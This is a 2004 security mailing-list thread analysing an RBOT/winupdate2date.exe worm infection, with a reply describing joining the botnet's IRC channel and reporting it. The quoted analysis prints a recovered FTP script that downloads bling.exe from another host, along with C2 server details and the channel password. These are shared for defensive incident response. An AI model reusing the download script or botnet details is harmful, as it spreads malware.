[Intrusions] Winupdate2date.exe: New worm variant?

Benjamin Koch BK-D at gmx.de
Fri Oct 1 13:43:41 GMT 2004 

Hello folks and friends ;)

Not long ago this thread was active.
I connected to this botnet server and joined the botnet channel.
I warned the Admin of that botnet (shut down the server or you get
into trouble aso.) and he was uncooperative...
So i made my threat comming true.

4-5 days ago i posted all my collected facts to the ISP of this net.
Since now the Server is offline ;)

Hope i could help you...

Greets Benjamin



Tuesday, September 21, 2004, 8:33:21 PM, you wrote:



AJ> Going over a Windows machine infected with RBOT:

AJ> ------------------------------------------------------------------
AJ> ------------------ First Machine ---------------------------------
AJ> ! REG.EXE VERSION 3.0

AJ> HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
AJ>     Microsoft Update Machine    REG_SZ  servicz.exe
AJ>     msupdates   REG_SZ  msupdt.exe
AJ> [root at gecko 040920-1]# cd ../040920-2
AJ> [root at gecko 040920-2]# more run.reg
AJ> ------------------------------------------------------------------




AJ> I came across a file that seemed to point to another campus machine as the
AJ> source of the infection:

AJ> ------------------------------------------------------------------
AJ> # cat o
AJ> open 130.85.ccc.ddd 19302
AJ> user 1 1
AJ> get bling.exe
AJ> quit


AJ> ------------------------------------------------------------------
AJ> ------------------ Second Machine --------------------------------


AJ> This second machine turned have an infection with different (extra?)
AJ> characteristics:

AJ> ------------------------------------------------------------------
AJ> # cat run.reg

AJ> ! REG.EXE VERSION 3.0

AJ> HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
AJ>     Cryptographic Service       REG_SZ 
AJ> C:\WINDOWS\System32\ioplmwb.exe
AJ>     msupdates   REG_SZ  msupdt.exe
AJ>     WindowsRegKey update2date   REG_SZ  winupdate2date.exe


AJ> ------------------------------------------------------------------
AJ> ------------------ Third Machine ---------------------------------


AJ> Then we turned up a third machine in the same building that also had
AJ> winupdate2date.exe (and did not have msupdt.exe):

AJ> ------------------------------------------------------------------
AJ> # cat run.reg

AJ> ! REG.EXE VERSION 3.0

AJ> HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
AJ>     McAfeeUpdaterUI     REG_SZ  "C:\Program Files\Network
AJ> Associates\Common Framework\UpdaterUI.exe" /StartedFromRunKey
AJ>     ShStatEXE   REG_SZ  "C:\Program Files\Network
AJ> Associates\VirusScan\SHSTAT.EXE" /STANDALONE
AJ>     NDPS        REG_SZ  C:\WINDOWS\System32\dpmw32.exe
AJ>     NWTRAY      REG_SZ  NWTRAY.EXE
AJ>     WindowsRegKey update2date   REG_SZ  winupdate2date.exe

AJ> HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents
AJ> ------------------------------------------------------------------


AJ> The file winupdate2date.exe has MD5 hash:

AJ> 	047379e3e9d02ced7e5dbf046a9b1f4c


AJ> I haven't been able to find a reference for it.  Has anyone else seen it
AJ> (and/or know anything about it)?

AJ> BTW, we found the third machine through a snort rule that detects RBOT
AJ> IRC traffic.  It's IRC channel was to server 66.111.42.128.

AJ> 09/21/04 14:19:28 dns 66.111.42.128
AJ> nslookup 66.111.42.128
AJ> Canonical name: unknown.sagonet.net
AJ> Addresses:
AJ>   66.111.42.128




AJ> The following text strings were at the beginning of the (slightly
AJ> sanitized) process memory dumps of winupdate2date.exe on the second
AJ> and third machines:

AJ> ------------------ PmDump from Second Machine ---------------------


AJ> # strings pmdump_3888_winupdate2date.exe.txt | more
AJ> [SCAN]: Random Scanner Avvia4
AJ> PONG :irc.NoNet.net
AJ> Scanner Avviato : 130.85.x.x:135  delay  3 secondi  999 us2052150 thre
AJ> [MAIN]: Joined channel: #!$!#.
AJ> PONG
AJ> :irc.NoNet.net
AJ> PING :irc.NoNet.net
AJ> PING
AJ> vwmdqlpk
AJ> 2052\
AJ> <DNS name of system deleted from this line - AFJ>
AJ>  NICK vwmdqlpk
AJ> USER oimxhfsl 0 0 :vwmdqlpk
AJ> oimxhfsl
AJ> server.maxshells.com
AJ> #!$!#
AJ> letmein
AJ> vwmdqlpk
AJ> WinSock 2.0
AJ> Running
AJ> winupdate2date
AJ>  &   !
AJ> .exe
AJ> winupdate2date.exe
AJ> C:\WINDOWS\System32
AJ> C:\WINDOWS\System32\winupdate2date.exe
AJ> CDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~

AJ> !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmno
AJ> tuvwxyz{|}~
AJ> w[IDENTD]: Server running on Port: 113.
AJ> IsProcessorFeature`
AJ> Actx
AJ> [IY-
AJ> SsHd,
AJ> [IY-H
AJ> SsHd,
AJ> C:\WINDOWS\System32\winupdate2date.exe 1792
AJ> "C:\WINDOWS\system32\winupdate2date.exe"

AJ> !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
AJ> -v1.3.14.3.2.22
AJ> er\Advanced
AJ> -v1.2.840.113549.1.1.1
AJ> 3v8?
AJ> 3v`?
AJ> CryptSIPDllPutSignedDataMsg
AJ> CryptSIPDllGetSignedDataMsg
AJ> CryptSIPDllRemoveSignedDataMsg
AJ> CryptSIPDllCreateIndirectData
AJ> CryptSIPDllVerifyIndirectData
AJ> CryptSIPDllIsMyFileType
AJ> CryptSIPDllIsMyFileType2
AJ> CryptDllExportPublicKeyInfoEx


AJ> ------------------- PmDump from Third Machine --------------------------

AJ> [root at gecko 040920-3]# strings
AJ> pmdump_1156_winupdate2date.exe.txt | more
AJ> [SCAN]: Random Scanner Avvia4
AJ> PONG :irc.NoNet.net
AJ> Scanner Avviato : 130.85.x.x:135  delay  3 secondi  999 us2046150 thre
AJ> [MAIN]: Joined channel: #!$!#.
AJ> PONG
AJ> :irc.NoNet.net
AJ> PING :irc.NoNet.net
AJ> PING
AJ> ongvjfr
AJ> 2046H
AJ> <DNS name of system deleted from this line - AFJ>
AJ>  NICK ongvjfr
AJ> USER webxah 0 0 :ongvjfr
AJ> webxah
AJ> server.maxshells.com
AJ> #!$!#
AJ> letmein
AJ> ongvjfr
AJ> WinSock 2.0
AJ> Running
AJ> winupdate2date
AJ>  &   !
AJ> .exe
AJ> winupdate2date.exe
AJ> C:\WINDOWS\System32
AJ> C:\WINDOWS\System32\winupdate2date.exe
AJ> CDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AJ> 
AJ> !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmno
AJ> tuvwxyz{|}~
AJ> w[IDENTD]: Server running on Port: 113.
AJ> IsProcessorFeature
AJ> Actx
AJ> [IY-
AJ> SsHd,
AJ> [IY-H
AJ> SsHd,
AJ> C:\WINDOWS\System32\winupdate2date.exe 1792
AJ> "C:\WINDOWS\system32\winupdate2date.exe"
AJ> 
AJ> !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~


AJ> ------------------------------------------------------------------------------
AJ> ** Andy Johnston (andy at umbc.edu)          *                   **
AJ> **                                        * PGP key:(afj2002) 4096/8448B056 **
AJ> ** Office of Information Technology, UMBC *   4A B4 96 64 D9 B6 EF E3 21 9A **
AJ> ** 410-455-2583 (v)/410-455-1065 (f)      *   46 1A 37 11 F5 6C 84 48 B0 56 **
AJ> ------------------------------------------------------------------------------
AJ> _______________________________________________
AJ> Intrusions mailing list
AJ> Intrusions at lists.sans.org
AJ> http://www.dshield.org/mailman/listinfo/intrusions

More information about the Intrusions mailing list